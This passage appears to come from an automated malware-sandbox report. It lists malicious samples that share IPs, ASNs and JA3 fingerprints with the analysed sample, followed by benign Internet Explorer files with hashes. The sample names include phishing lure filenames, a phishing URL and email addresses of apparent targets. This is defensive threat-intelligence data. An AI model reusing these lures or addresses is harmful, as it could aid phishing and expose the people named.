	ZRz0Aq1Rf0.dll	Get hash	malicious	Browse	151.101.1.44
	mon44_cr.dll	Get hash	malicious	Browse	151.101.1.44
	mon41_cr.dll	Get hash	malicious	Browse	151.101.1.44
	mon4498.dll	Get hash	malicious	Browse	151.101.1.44
	e888888888.dll	Get hash	malicious	Browse	151.101.1.44
	1233.exe	Get hash	malicious	Browse	151.101.1.44
	Server.exe	Get hash	malicious	Browse	151.101.1.44
	2200.dll	Get hash	malicious	Browse	151.101.1.44
	mon48_cr.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.5db96940e68acc98.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.fac603176f7a6a20.dll	Get hash	malicious	Browse	151.101.1.44
	8.prtyok.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Variant.Bulz.349310.9384.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Variant.Razy.840176.14264.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Variant.Bulz.349310.24122.dll	Get hash	malicious	Browse	151.101.1.44
	login.jpg.dll	Get hash	malicious	Browse	151.101.1.44
	footer.jpg.dll	Get hash	malicious	Browse	151.101.1.44
	acr1.dll	Get hash	malicious	Browse	151.101.1.44
contextual.media.net	DUcKsYsyX0.dll	Get hash	malicious	Browse	23.210.250.97
	RI51uAIUyL.dll	Get hash	malicious	Browse	23.210.250.97
	ZRz0Aq1Rf0.dll	Get hash	malicious	Browse	23.210.250.97
	mon44_cr.dll	Get hash	malicious	Browse	23.210.250.97
	mon41_cr.dll	Get hash	malicious	Browse	184.30.24.22
	mon4498.dll	Get hash	malicious	Browse	184.30.24.22
	e888888888.dll	Get hash	malicious	Browse	23.218.208.23
	1233.exe	Get hash	malicious	Browse	184.30.24.22
	Server.exe	Get hash	malicious	Browse	184.30.24.22
	2200.dll	Get hash	malicious	Browse	184.30.24.22
	mon48_cr.dll	Get hash	malicious	Browse	184.30.24.22
	SecuriteInfo.com.Generic.mg.5db96940e68acc98.dll	Get hash	malicious	Browse	92.122.253.103
	Wh102yYa..dll	Get hash	malicious	Browse	23.210.250.97
	SecuriteInfo.com.Generic.mg.fac603176f7a6a20.dll	Get hash	malicious	Browse	2.20.86.97
	8.prtyok.dll	Get hash	malicious	Browse	104.84.56.24
	SecuriteInfo.com.Variant.Bulz.349310.9384.dll	Get hash	malicious	Browse	104.84.56.24
	SecuriteInfo.com.Variant.Razy.840176.14264.dll	Get hash	malicious	Browse	104.84.56.24
	SecuriteInfo.com.Variant.Bulz.349310.24122.dll	Get hash	malicious	Browse	104.84.56.24
	login.jpg.dll	Get hash	malicious	Browse	104.84.56.24
	footer.jpg.dll	Get hash	malicious	Browse	184.30.24.22

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	CompensationClaim-1625519734-02022021.xls	Get hash	malicious	Browse	34.66.107.230
	CompensationClaim-1625519734-02022021.xls	Get hash	malicious	Browse	34.66.107.230
	SecuriteInfo.com.BehavesLike.Win32.Emotet.jc.exe	Get hash	malicious	Browse	34.65.61.179
	CompensationClaim-1828072340-02022021.xls	Get hash	malicious	Browse	34.66.107.230
	CompensationClaim-1828072340-02022021.xls	Get hash	malicious	Browse	34.66.107.230
	CompensationClaim-1378529713-02022021.xls	Get hash	malicious	Browse	34.66.107.230
	CompensationClaim-1378529713-02022021.xls	Get hash	malicious	Browse	34.66.107.230
	oHqMFmPndx.exe	Get hash	malicious	Browse	34.119.201.254
	Documentation__EG382U8V.doc	Get hash	malicious	Browse	34.67.99.22
	#Ud83c#Udfb6 18 November, 2020 Pam.Guetschow@citrix.com.wavv.htm	Get hash	malicious	Browse	34.101.72.248
	#Ud83c#Udfb6 03 November, 2020 prodriguez@fnbsm.com.wavv.htm	Get hash	malicious	Browse	34.101.72.248
	http://49.120.66.34.bc.googleusercontent.com/osh?email=bob@microsoft.com	Get hash	malicious	Browse	34.66.120.49
	SecuriteInfo.com.Heur.13242.doc	Get hash	malicious	Browse	34.67.97.45
	8845_2020_09_29.doc	Get hash	malicious	Browse	34.67.97.45
	QgpyVFbQ7w.exe	Get hash	malicious	Browse	34.65.231.1
	qySMTADEjr.exe	Get hash	malicious	Browse	34.65.231.1
	SecuriteInfo.com.Trojan.Siggen10.9113.10424.exe	Get hash	malicious	Browse	34.65.231.1
	SecuriteInfo.com.Trojan.Siggen10.9265.86.exe	Get hash	malicious	Browse	34.65.231.1
	Dlya sverki 13.07.2020.exe	Get hash	malicious	Browse	34.67.67.23
	u17mv3Hf1BdS3fQ.exe	Get hash	malicious	Browse	34.66.135.39

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
9e10692f1b7f78228b2d4e424db3a98c	DUcKsYsyX0.dll	Get hash	malicious	Browse	104.20.184.68 151.101.1.44
	7eec14e7cec4dc93fbf53e08998b2340.exe	Get hash	malicious	Browse	104.20.184.68 151.101.1.44
	RI51uAIUyL.dll	Get hash	malicious	Browse	104.20.184.68 151.101.1.44
	L257MJZ0TP.htm	Get hash	malicious	Browse	104.20.184.68 151.101.1.44
	brewin-02-02-21 Statement_763108amFtZXMubXV0aW1lcg==.htm	Get hash	malicious	Browse	104.20.184.68 151.101.1.44
	658908343Bel.html	Get hash	malicious	Browse	104.20.184.68 151.101.1.44
	P178979.htm	Get hash	malicious	Browse	104.20.184.68 151.101.1.44
	03728d6617cd13b19bd69625f7ead202.exe	Get hash	malicious	Browse	104.20.184.68 151.101.1.44
	PO 20191003.exe	Get hash	malicious	Browse	104.20.184.68 151.101.1.44
	SecuriteInfo.com.Trojan.GenericKD.36134277.347.exe	Get hash	malicious	Browse	104.20.184.68 151.101.1.44
	SecuriteInfo.com.Trojan.PWS.Siggen2.61222.12968.exe	Get hash	malicious	Browse	104.20.184.68 151.101.1.44
	ZRz0Aq1Rf0.dll	Get hash	malicious	Browse	104.20.184.68 151.101.1.44
	mon44_cr.dll	Get hash	malicious	Browse	104.20.184.68 151.101.1.44
	mon41_cr.dll	Get hash	malicious	Browse	104.20.184.68 151.101.1.44
	mon4498.dll	Get hash	malicious	Browse	104.20.184.68 151.101.1.44
	e888888888.dll	Get hash	malicious	Browse	104.20.184.68 151.101.1.44
	658908343Bel.html	Get hash	malicious	Browse	104.20.184.68 151.101.1.44
	Invoice due.html	Get hash	malicious	Browse	104.20.184.68 151.101.1.44
	One Note celine.wilcox@brewin.co.uk.html	Get hash	malicious	Browse	104.20.184.68 151.101.1.44
	#Ud83d#Udcde Herbalife.com AudioMessage_50-74981.htm	Get hash	malicious	Browse	104.20.184.68 151.101.1.44

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\DURNCK2N\www.msn[2].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.469670487371862
Encrypted:	false
SSDEEP:	3:D90aKb:JFKb
MD5:	C1DDEA3EF6BBEF3E7060A1A9AD89E4C5
SHA1:	35E3224FCBD3E1AF306F2B6A2C6BBEA9B0867966
SHA-256:	B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB
SHA-512:	6BE8CEC7C862AFAE5B37AA32DC5BB45912881A3276606DA41BF808A4EF92C318B355E616BF45A257B995520D72B7C08752C0BE445DCEADE5CF79F73480910FED
Malicious:	false
Preview:	<root></root>

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\QALADACS\contextual.media[1].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	2987
Entropy (8bit):	4.950739398644496
Encrypted:	false
SSDEEP:	48:L7Di7Di7DiRDiRDiRDiRDgvDiRDitiDitiDitiDitiDiaDiaDiaDiaDEzDb/Dian:PccmmmmMvmLLLLNNNN4zXN4zXN4zX7Nz
MD5:	4002DB67F61887BCA5898C7997AC014C
SHA1:	2E587DB846AF0FDCF4D743019F72DB389DAB917F
SHA-256:	AE3EEBB15C9EDF6CF865B12F4A49A1412593CD3D36D644A7AC32ABB299479773
SHA-512:	AD636FC71BF218171A8C4DD62E74F4E698DDB0923BEA8DCC1DA4E7819D20D9F667122A5522645D32F1592C1972BADEAB9B94EC6D57F12E11C34FC54B26E33054
Malicious:	false
Preview:	<root></root><root><item name="HBCM_BIDS" value="{}" ltime="1022197264" htime="30868516" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1022197264" htime="30868516" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1022197264" htime="30868516" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1022397264" htime="30868516" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1022397264" htime="30868516" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1022397264" htime="30868516" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1022397264" htime="30868516" /><item name="mntest" value="mntest" ltime="1028757264" htime="30868516" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1022397264" htime="30868516" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1036797264" htime="30868516" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1036797264" htime="30868516" /></root><root><item name="HBCM_BIDS" value="{}" ltime="1036797264" htime

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{75BD31D2-7017-11EB-90E5-ECF4BB570DC9}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	89384
Entropy (8bit):	2.192324357918229
Encrypted:	false
SSDEEP:	384:r01P++6xBuao+I5Cxd8yl5310hRr0pp6Kpf:jnP/36Dwn
MD5:	D420899BEEE44BD14AA77B5D83D105F9
SHA1:	631FA2669185BC3D5BFB987EF86B32F84EBBFE38
SHA-256:	2C35FCB224B152E0F731040DC76B553674B9FFA4D18EA8EC0A4D8D694C5CC462
SHA-512:	B56DB5424E78A3900CE9A595C856BB3743942202154EED7095650907987EABFF65571EB336F1E665D6D5FDA6A7A659660CC05DA50FC8D37159EBF6ADF7FF5488
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{75BD31D4-7017-11EB-90E5-ECF4BB570DC9}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	359948
Entropy (8bit):	3.628670384757461
Encrypted:	false
SSDEEP:	3072:8Z/2BfcYmu5kLTzGtHZ/2Bfc/mu5kLTzGt5Z/2BfcYmu5kLTzGtoZ/2Bfc/mu5kF:12xJB
MD5:	2C0FCAD5AFD9BA9EC507824C8ADBE212
SHA1:	66C3D4158ED59F2E89DF1F3C23E4574AC264E141
SHA-256:	88DAFA665A36D0A9F8F19327F642AB2250F02778CB0DF65B1B6672B21556C201
SHA-512:	A30DCF8774E2A3E10445FC6132F92A9D5146DE2DDB23F23069AD7F4E9A0421C67B725F7E342619E48F6C2304C18AD4772371C658A12C042EF75D76EE824148FE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8CCE525F-7017-11EB-90E5-ECF4BB570DC9}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28156
Entropy (8bit):	1.923906601902166
Encrypted:	false
SSDEEP:	192:riZZQI6ykUjx2NWAMgdhXoVQM4qQilhXoVMXoVQM4qIA:re+TrGgkVchqxjhRqxL
MD5:	3AAEB9337106F1A7AB89D5BCD970658C
SHA1:	377AF013931328C63D11F3F87ED803DC3D665C7D
SHA-256:	2D7B641649F49FCBF183F54816B20EA00AA8B420D6EB47D20986A97C057AD756
SHA-512:	3AE34FE52BF0154F2C793DCDD299144590AF1456FE98C76AB20C8055A88BBEF5C3CE564CF8AFE9BBF9771E2A3F13BAC383D8F7EDFDBE8AEB1CC9E7D88163EC63
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8CCE5261-7017-11EB-90E5-ECF4BB570DC9}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28160
Entropy (8bit):	1.9190881858140454
Encrypted:	false
SSDEEP:	96:rrZMQT6BBSSjB2+WXMrJfcQC67tyVcjQC67t6A:rrZMQT6BkSjB2+WXMrpc6YVcj6EA
MD5:	BE96385D153AFE49884FA03BDC5CFB96
SHA1:	2A9E7E7EDFBB8ED7008D7BA40411A49620712D8C
SHA-256:	6DFF5555C415C52EFE5112E6B8346D3918DF9FD098F0DB580D7CE00B72067206
SHA-512:	B230CF0DF24E10F399574FB5582054E8A0C973FF4D430B6B8962B9C98C59E3C19DC33302E623E467B28A1BBE4D46DCF83849A4BC1AA3CF5BB220E00041795BF7
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8CCE5263-7017-11EB-90E5-ECF4BB570DC9}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	modified
Size (bytes):	28152
Entropy (8bit):	1.922873310389224
Encrypted:	false
SSDEEP:	192:rWoZ4pQ66QkYjFP2FjWFAMFIxXtirylXsirRA:rWo4OldaQM/eddcn
MD5:	3F2D1D72B7A639775AA6071E31013D5B
SHA1:	30258AB053BE2CCAF1A3B299A44AD4B21761A41F
SHA-256:	447DBBB78248E4E68E531EC6D78F41680632E281DA0B11037B6D1E882F08441F
SHA-512:	23A65E5622267A408E0AA9A35D846306F954CD26B98F0D851DBB162064790B52861B4640B7FF323C3ED17914D03BBE7D8507A195B0D1D892A74B3F37D50E110F
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	657
Entropy (8bit):	5.101786761714895
Encrypted:	false
SSDEEP:	12:TMHdNMNxOEsDEODE1nWimI002EtM3MHdNMNxOEsDEOubov1nWimI00ONVbkEtMb:2d6NxO5DVDKSZHKd6NxO5DVubMSZ7Qb
MD5:	26421A59E71CF110E4AC15E5F656DD3F
SHA1:	172FF7C049329F1F75CAB3F17E476F471A0321FD
SHA-256:	756FC747DEAD21ECDDAA3D1790AA179AF440F81F907D96DC2703E50B424D6E35
SHA-512:	34CDA2239D4FDE19DFB08FE6B1C5483EAAAB1F28ABBC866CD0DDA152EE0E47265874A91FED1C1EC228E5712A25377FE484A4AC5B229A56B5D3A459527209E23C
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x4d85ffbe,0x01d70424</date><accdate>0x4d85ffbe,0x01d70424</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x4d85ffbe,0x01d70424</date><accdate>0x4d88621f,0x01d70424</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	654
Entropy (8bit):	5.107887880469443
Encrypted:	false
SSDEEP:	12:TMHdNMNxe2ksSe2vOSe2v1nWimI002EtM3MHdNMNxe2ksSe2vOSe2v1nWimI00OV:2d6NxrZSZWSZ9SZHKd6NxrZSZWSZ9SZp
MD5:	F336536B5D1CE5BBCE97C055719011CE
SHA1:	27836D16DBEFE80112427579D0232494DC798DF9
SHA-256:	527449C7093524404B88BF288C6FF2F7EF4A4EE7A82007AADC36D122270B5E91
SHA-512:	990360EBF64434A8F65B22A8A50A1E4C35981B9994969CB959D271A4AD6B5A0F4065D2A6A5C82DEA0D01F02389639DEFCC84BA0C3B92353C573DEFBB6DB9DFE2
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x4d7ed8b4,0x01d70424</date><accdate>0x4d7ed8b4,0x01d70424</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x4d7ed8b4,0x01d70424</date><accdate>0x4d7ed8b4,0x01d70424</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	663
Entropy (8bit):	5.131508779601073
Encrypted:	false
SSDEEP:	12:TMHdNMNxvLsubovOubov1nWimI002EtM3MHdNMNxvLsubovOubov1nWimI00ONmf:2d6NxvwubPubMSZHKd6NxvwubPubMSZW
MD5:	A1E24723860EE0037651143F9D068D59
SHA1:	49BE561D08BF3399A4677DFCB7D2E0BB27D44F70
SHA-256:	1928298172506081F86FACF136EB9826DBB6E64EA33896878B6E740672D25BAB
SHA-512:	05889A519FEDB845DD10159DB7E56B88B219BEC9CB13DB1AC612DAB6915EF70198F7ED7455A889925883E9D9E4428D6D9A34D04E89953B8E999E61DBEA4D20CD
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x4d88621f,0x01d70424</date><accdate>0x4d88621f,0x01d70424</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x4d88621f,0x01d70424</date><accdate>0x4d88621f,0x01d70424</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	648
Entropy (8bit):	5.139263329290746
Encrypted:	false
SSDEEP:	12:TMHdNMNxisUmBOUmB1nWimI002EtM3MHdNMNxisUmBOUmB1nWimI00ONd5EtMb:2d6NxnQXSZHKd6NxnQXSZ7njb
MD5:	3B529125BD6379006CDA7C1A5ED37F7C
SHA1:	0D3E7995A50F0BF28510B56BC96F695607263F9B
SHA-256:	A101BF6A09028047BBB050480E67881D532913AF6EDA017FF7B3F7B625686F1E
SHA-512:	E363F87E12ED659D1B9294C92D856B682D9EA66D8D546F175D13C6337FC56B44B2C99C22373F9D7405A5FE30BDB7621E203C5D883049663A5B2910797C8F4EF2
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x4d839d63,0x01d70424</date><accdate>0x4d839d63,0x01d70424</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x4d839d63,0x01d70424</date><accdate>0x4d839d63,0x01d70424</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	657
Entropy (8bit):	5.147199382375345
Encrypted:	false
SSDEEP:	12:TMHdNMNxhGwsubovOubov1nWimI002EtM3MHdNMNxhGwsubovOubov1nWimI00Oo:2d6NxQFubPubMSZHKd6NxQFubPubMSZ0
MD5:	BC08ABFC16F82A8403E7B707F5D7D546
SHA1:	F00E7F1D5C385B42E5A22F9825ED2B1577293FA1
SHA-256:	FB378A7246765CDC16BC4A3E1D8278E36D8DC24B9181183E4A7555BB72A9AFE0
SHA-512:	8EE1EB85CE445E2BFB6DC6F06BD000BF86C63C207570272210666E79B8181E4D024223D3D4A97E0D88A99972570BCE21872886EB371C69321042AEF7F135BB2D
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x4d88621f,0x01d70424</date><accdate>0x4d88621f,0x01d70424</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x4d88621f,0x01d70424</date><accdate>0x4d88621f,0x01d70424</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	654
Entropy (8bit):	5.091407562482365
Encrypted:	false
SSDEEP:	12:TMHdNMNx0nsDEODE1nWimI002EtM3MHdNMNx0nsDEODE1nWimI00ONxEtMb:2d6Nx0sDVDKSZHKd6Nx0sDVDKSZ7Vb
MD5:	AAA0C78C3A42B1558E7FCA987129183E
SHA1:	F9EDE5CF8DC9E6D792DF9784F252A5333A7A74FD
SHA-256:	4E54F244C560E3E91010A584E28DAF3CD189A868A8578AB270B4F4DADB3ECB3E
SHA-512:	DF6E2E1C9F45498F843B857AB7CBDC0640C8B545C086747143BA34E10C2240EA489768DF9613D9B00285013454DFA7F225F08C58ACFA902476AAD47C08050151
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x4d85ffbe,0x01d70424</date><accdate>0x4d85ffbe,0x01d70424</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x4d85ffbe,0x01d70424</date><accdate>0x4d85ffbe,0x01d70424</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	657
Entropy (8bit):	5.129799582093093
Encrypted:	false
SSDEEP:	12:TMHdNMNxxsDEODE1nWimI002EtM3MHdNMNxxsDEODE1nWimI00ON6Kq5EtMb:2d6NxmDVDKSZHKd6NxmDVDKSZ7ub
MD5:	EF35A6985C8C2E2A68D250D2A31D3545
SHA1:	AE4F096F2E1053FEE92C605492B0A42D1C5A2B7C
SHA-256:	1E22DECB5AF48708EE5871F3B82730689CCD0814E33C1333504AA9A4D72E0676
SHA-512:	DE8F29C5E71C82F6F2027D377A822C7920D007C808ADCC72EB8D877CD036E2658D564FCCCD74B177395D06ED262A7395BB09A23BAE908002841AC7D7CEE1FFAA
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x4d85ffbe,0x01d70424</date><accdate>0x4d85ffbe,0x01d70424</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x4d85ffbe,0x01d70424</date><accdate>0x4d85ffbe,0x01d70424</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	660
Entropy (8bit):	5.144186772590672
Encrypted:	false
SSDEEP:	12:TMHdNMNxcsUmBOUmB1nWimI002EtM3MHdNMNxcsUmBOUmB1nWimI00ONVEtMb:2d6NxBQXSZHKd6NxBQXSZ71b
MD5:	73A49C0F3ECF88727F63073500865D37
SHA1:	95F1DE28709DBC0216817878CD3E78FEB0055568
SHA-256:	BA5D7E5A1098CA7189DA0CDBCEA4EE2D107B4A34B91B550900670AF5AB365A79
SHA-512:	EA6EDFC3D042042955AC91CC32AED13D3A74C9B3E985655E64FFA132061B5718FE1067A7EDA3EE33AE392D2F9DB6CE902E6E4DB24EE287C29FEC39217EB4D599
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x4d839d63,0x01d70424</date><accdate>0x4d839d63,0x01d70424</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x4d839d63,0x01d70424</date><accdate>0x4d839d63,0x01d70424</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	654
Entropy (8bit):	5.124264911512246
Encrypted:	false
SSDEEP:	12:TMHdNMNxfnsUmBOUmB1nWimI002EtM3MHdNMNxfnsUmBOUmB1nWimI00ONe5EtMb:2d6NxUQXSZHKd6NxUQXSZ7Ejb
MD5:	D7930AEC8390D7629B4FEF5D2DA8679F
SHA1:	8684FB0C9ACB820F99817EB86D78DDB870A8EECF
SHA-256:	844BB71BE02CBEFE6BD357557C1483B63205E63428CE2BED38423A621A10F2BF
SHA-512:	A338BD0DD61F104AA5237D6A3AEABF9C3D4A3029BD4A53ABA9EA95222FA21FE36B18A0C837FC0B85486FD343BB8539982B3C0D7813A456CF4D5ADD50CF443EAA
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x4d839d63,0x01d70424</date><accdate>0x4d839d63,0x01d70424</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x4d839d63,0x01d70424</date><accdate>0x4d839d63,0x01d70424</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\dikxvqf\imagestore.dat Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	934
Entropy (8bit):	7.038621512074286
Encrypted:	false
SSDEEP:	24:u6tWaF/6easyD/iCHLSWWqyCoTTdTc+yhaX4b9upGU3:u6tWu/6symC+PTCq5TcBUX4bm3
MD5:	BD4BE4B99A6768DFBA149F8BDC4091BB
SHA1:	61D2564C4D1C7EB1E9111A2DE02EB6D2B803914E
SHA-256:	E274AA8419A5BDCF4B271BDA0A30842B452DD581E6A824A759B05907A25807D5
SHA-512:	4026FFFBAC3F031212AEC90A60F102FCF1F551779E4F87CBBEBB98BCF363FA05A89BD4340C784DBFF1B5169668A7710B8325EB46BBD51136BEF0E73A723FFD54
Malicious:	false
